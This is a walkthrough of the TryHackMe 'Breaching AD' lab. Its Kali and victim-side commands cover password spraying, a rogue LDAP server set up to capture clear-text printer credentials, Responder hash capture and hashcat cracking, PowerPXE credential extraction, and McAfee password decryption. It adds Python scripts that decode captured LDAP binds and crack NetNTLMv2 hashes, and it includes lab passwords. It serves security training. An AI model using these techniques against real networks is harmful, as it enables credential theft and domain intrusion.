Room Link: https://tryhackme.com/room/breachingad
Introduction to AD Breaches
Kali
systemd-resolve --interface breachad --set-dns $THMDCIP --set-domain za.tryhackme.com
nslookup thmdc.za.tryhackme.com
NTLM Authenticated Services
Kali
unzip passwordsprayer.zip
python /root/Rooms/BreachingAD/task3/ntlm_passwordspray.py -u usernames.txt -f za.tryhackme.com -p Changeme123 -a "http://ntlmauth.za.tryhackme.com"
LDAP Bind Credentials
Kali (port 389 is privileged, so both commands need root)
sudo service slapd stop
sudo nc -lvp 389
Hosting a Rogue LDAP Server
Kali
sudo apt-get update && sudo apt-get -y install slapd ldap-utils && sudo systemctl enable slapd
sudo dpkg-reconfigure -p low slapd
Kali
vi olcSaslSecProps.ldif
olcSaslSecProps.ldif
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred
The file has the following properties:
olcSaslSecProps: Specifies the SASL security properties
noanonymous: Disables mechanisms that support anonymous login
minssf: Specifies the minimum acceptable security strength factor; 0 means no integrity or confidentiality protection is required
passcred: Only offers mechanisms that pass the client's credentials to the server (PLAIN and LOGIN), so challenge-response mechanisms that would never reveal the password are withdrawn
Now we can use the ldif file to patch our LDAP server using the following:
Kali
sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart
ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms
[Screenshots: ldapsearch output before and after the change. Before, the server offers its default set of stronger mechanisms; after, supportedSASLMechanisms lists only PLAIN and LOGIN, which is what forces a connecting client to send its password in clear text.]
Capturing LDAP Credentials
Our rogue LDAP server is now configured. When we click "Test Settings" at http://printer.za.tryhackme.com/settings.aspx, the printer binds to our server and, because only PLAIN and LOGIN are offered, sends its credentials in clear text. If the rogue server is downgrading the connection correctly, the page reports the error "This distinguished name contains invalid syntax". Start tcpdump before clicking so the bind is captured:
Kali
sudo tcpdump -SX -i breachad tcp port 389
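Reading the capture: tcpdump -X prints the bind as hex, and the credentials sit inside a BER-encoded LDAP BindRequest (RFC 4511). The decoder below is an added example, not code from the room or from any tool it uses. It constructs sample simple and SASL PLAIN BindRequests with placeholder DN, user and password values (no real capture is used) and then parses them the same way you would parse the bytes tcpdump showed, including the case where the captured TCP payload also carries other LDAP operations that must be skipped.

```python
"""Decode the credentials a client leaks when a rogue LDAP server has downgraded
the bind to simple or SASL PLAIN. Added example, not part of the TryHackMe room;
all DNs, users and passwords below are constructed placeholders."""


def _encode_tlv(tag: int, payload: bytes) -> bytes:
    """BER-encode one tag/length/value triple (definite length form)."""
    n = len(payload)
    if n < 0x80:
        length = bytes([n])
    else:
        lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(lb)]) + lb
    return bytes([tag]) + length + payload


def _decode_tlv(buf: bytes, pos: int):
    """Return (tag, value, position after the value) for the TLV at buf[pos]."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:  # long form: low 7 bits give the number of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def _ldap_message(message_id: int, bind_body: bytes) -> bytes:
    # LDAPMessage ::= SEQUENCE { messageID INTEGER, protocolOp BindRequest [APPLICATION 0] }
    return _encode_tlv(0x30, _encode_tlv(0x02, bytes([message_id])) + _encode_tlv(0x60, bind_body))


def build_simple_bind(message_id: int, dn: str, password: str) -> bytes:
    """BindRequest whose authentication CHOICE is simple [0]: the raw clear-text password."""
    body = (_encode_tlv(0x02, b"\x03")               # version 3
            + _encode_tlv(0x04, dn.encode())         # name
            + _encode_tlv(0x80, password.encode()))  # [0] simple
    return _ldap_message(message_id, body)


def build_sasl_plain_bind(message_id: int, authcid: str, password: str, authzid: str = "") -> bytes:
    """BindRequest with sasl [3] { mechanism "PLAIN", credentials authzid NUL authcid NUL passwd }."""
    creds = f"{authzid}\x00{authcid}\x00{password}".encode()
    sasl = _encode_tlv(0x04, b"PLAIN") + _encode_tlv(0x04, creds)
    body = (_encode_tlv(0x02, b"\x03")
            + _encode_tlv(0x04, b"")                 # name is normally empty for SASL binds
            + _encode_tlv(0xA3, sasl))               # [3] sasl
    return _ldap_message(message_id, body)


def parse_bind_request(pkt: bytes) -> dict:
    """Extract whatever secret a single BindRequest carries; raise on any other LDAP operation."""
    tag, msg, _ = _decode_tlv(pkt, 0)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage SEQUENCE")
    _, mid, pos = _decode_tlv(msg, 0)
    tag, body, _ = _decode_tlv(msg, pos)
    if tag != 0x60:
        raise ValueError(f"not a BindRequest (protocolOp tag 0x{tag:02x})")
    _, ver, pos = _decode_tlv(body, 0)
    _, name, pos = _decode_tlv(body, pos)
    tag, auth, _ = _decode_tlv(body, pos)
    out = {"message_id": int.from_bytes(mid, "big"), "version": ver[0],
           "name": name.decode(errors="replace")}
    if tag == 0x80:                                  # simple bind: the value is the password itself
        out.update(method="simple", password=auth.decode(errors="replace"))
    elif tag == 0xA3:                                # SASL bind: mechanism plus optional credentials
        _, mech, p = _decode_tlv(auth, 0)
        creds = _decode_tlv(auth, p)[1] if p < len(auth) else b""
        out.update(method="sasl", mechanism=mech.decode())
        if mech == b"PLAIN":                         # PLAIN ships the password in the first message
            authzid, authcid, pw = creds.split(b"\x00", 2)
            out.update(authzid=authzid.decode(), authcid=authcid.decode(),
                       password=pw.decode(errors="replace"))
        else:                                        # DIGEST-MD5, GSS-SPNEGO, ...: no clear-text secret
            out["credentials"] = creds.hex()
    else:
        raise ValueError(f"unknown authentication choice 0x{tag:02x}")
    return out


def extract_binds(stream: bytes) -> list:
    """Walk a reassembled TCP payload and return every BindRequest found in it."""
    found, pos = [], 0
    while pos < len(stream):
        _, _, nxt = _decode_tlv(stream, pos)
        try:
            found.append(parse_bind_request(stream[pos:nxt]))
        except ValueError:
            pass  # some other operation (search, unbind, ...): skip it
        pos = nxt
    return found


if __name__ == "__main__":
    # Constructed sample stream: simple bind, UnbindRequest ([APPLICATION 2] NULL), SASL PLAIN bind.
    unbind = _encode_tlv(0x30, _encode_tlv(0x02, b"\x02") + _encode_tlv(0x42, b""))
    sample = (build_simple_bind(1, "cn=svc_printer,dc=example,dc=com", "Winter2024!")
              + unbind + build_sasl_plain_bind(3, "svc_printer", "Winter2024!"))
    for bind in extract_binds(sample):
        print(bind)
```

To use it on a real capture, save the port 389 stream with tcpdump -w and feed the client-to-server TCP payload bytes to extract_binds; the long-form length handling matters because a bind carrying a long DN or a large SASL credential block will not fit the one-byte short form.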
Authentication Relays
Kali
sudo service slapd stop
sudo responder -I breachad
hashcat mode 5600 is NetNTLMv2, the format Responder logs the captured challenge-response in:
Kali
hashcat -m 5600 hash.txt passwordlist.txt --force
hashcat -m 5600 hash.txt passwordlist.txt --force --show
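What mode 5600 actually computes: for each candidate password hashcat derives the NT hash (MD4 of the UTF-16LE password), then the NTLMv2 key (HMAC-MD5 over the upper-cased user and the domain), then the NTProofStr (HMAC-MD5 over the server challenge and the blob) and compares it with the captured value. The script below is an added example that walks through that chain on a constructed hash line; it is not the room's code or Responder's. MD4 is implemented inline because Python builds on OpenSSL 3 usually refuse hashlib.new("md4"); the user name, challenge and blob are placeholders, and the blob is a minimal stand-in for the real NTLMv2_CLIENT_CHALLENGE structure.

```python
"""Recompute a NetNTLMv2 response for candidate passwords, i.e. what hashcat -m 5600
does with a Responder hash line. Added example, not part of the TryHackMe room;
the demo challenge, blob and user are constructed, not captured."""
import hashlib
import hmac
import struct

_M = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & _M


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 (needed for the NT hash; often missing from hashlib)."""
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (  # (function, additive constant, shifts, word order) per round
        (f, 0x00000000, (3, 7, 11, 19), tuple(range(16))),
        (g, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for func, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                a = _rotl((a + func(b, c, d) + x[idx] + k) & _M, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate roles: next step updates the old d
        a, b, c, d = (a + aa) & _M, (b + bb) & _M, (c + cc) & _M, (d + dd) & _M
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 of the UTF-16LE password."""
    return md4(password.encode("utf-16le"))


def netntlmv2_proof(password: str, user: str, domain: str,
                    server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(NTOWFv2, challenge || blob), where
    NTOWFv2 = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) || domain))."""
    ntlmv2_key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"),
                          hashlib.md5).digest()
    return hmac.new(ntlmv2_key, server_challenge + blob, hashlib.md5).digest()


def to_hashcat_5600(user: str, domain: str, server_challenge: bytes, proof: bytes, blob: bytes) -> str:
    """USER::DOMAIN:challenge:NTProofStr:blob, the layout Responder logs and -m 5600 reads."""
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack_5600(line: str, wordlist):
    """Return the first candidate whose recomputed NTProofStr matches the captured one, else None."""
    user, _, rest = line.partition("::")
    domain, challenge_hex, proof_hex, blob_hex = rest.split(":", 3)
    challenge, proof, blob = bytes.fromhex(challenge_hex), bytes.fromhex(proof_hex), bytes.fromhex(blob_hex)
    for candidate in wordlist:
        if hmac.compare_digest(netntlmv2_proof(candidate, user, domain, challenge, blob), proof):
            return candidate
    return None


if __name__ == "__main__":
    # Constructed values: 8-byte server challenge and a minimal stand-in for the NTLMv2 blob.
    challenge = bytes.fromhex("1122334455667788")
    blob = bytes.fromhex("0101000000000000") + b"\x00" * 8 + bytes.fromhex("aabbccddeeff0011") + b"\x00" * 8
    proof = netntlmv2_proof("Changeme123", "svc_demo", "ZA", challenge, blob)
    line = to_hashcat_5600("svc_demo", "ZA", challenge, proof, blob)
    print(line)
    print(crack_5600(line, ["Password1", "Summer2023", "Changeme123"]))
```

The same line format means a Responder capture can be pasted straight into crack_5600 for a small targeted list; for anything larger use hashcat, which does the identical computation on the GPU. Note that the domain field is taken as the client sent it (usually the NetBIOS name, here ZA) and only the user name is upper-cased, exactly as in the NTOWFv2 definition.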
Microsoft Deployment Toolkit
Kali
ssh thm@THMJMP1.za.tryhackme.com
Password: Password1@
Victim
cd Documents
mkdir thm
copy C:\powerpxe thm
cd thm
Victim ($THMMDTIP and the truncated GUID in the BCD filename are placeholders for the MDT server IP and the BCD file name listed in the room)
tftp -i $THMMDTIP GET "\Tmp\x64{39...28}.bcd" conf.bcd
Victim
powershell -executionpolicy bypass
Import-Module .\PowerPXE.ps1
$BCDFile = "conf.bcd"
Get-WimFile -bcdFile $BCDFile
Victim
tftp -i $THMMDTIP GET "<PXE Boot Image Location>" pxeboot.wim
Victim
Get-FindCredentials -WimFile pxeboot.wim
Configuration Files
Victim
cd C:\ProgramData\McAfee\Agent\DB
Kali (the copy is pulled from the jump host to the attack machine)
scp thm@THMJMP1.za.tryhackme.com:C:/ProgramData/McAfee/Agent/DB/ma.db .
Password: Password1@
Kali
cp /root/Rooms/BreachingAD/task7/mcafeesitelistpwddecryption.zip .
unzip mcafeesitelistpwddecryption.zip
Kali
python2 mcafee-sitelist-pwd-decryption-master/mcafee_sitelist_pwd_decrypt.py jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==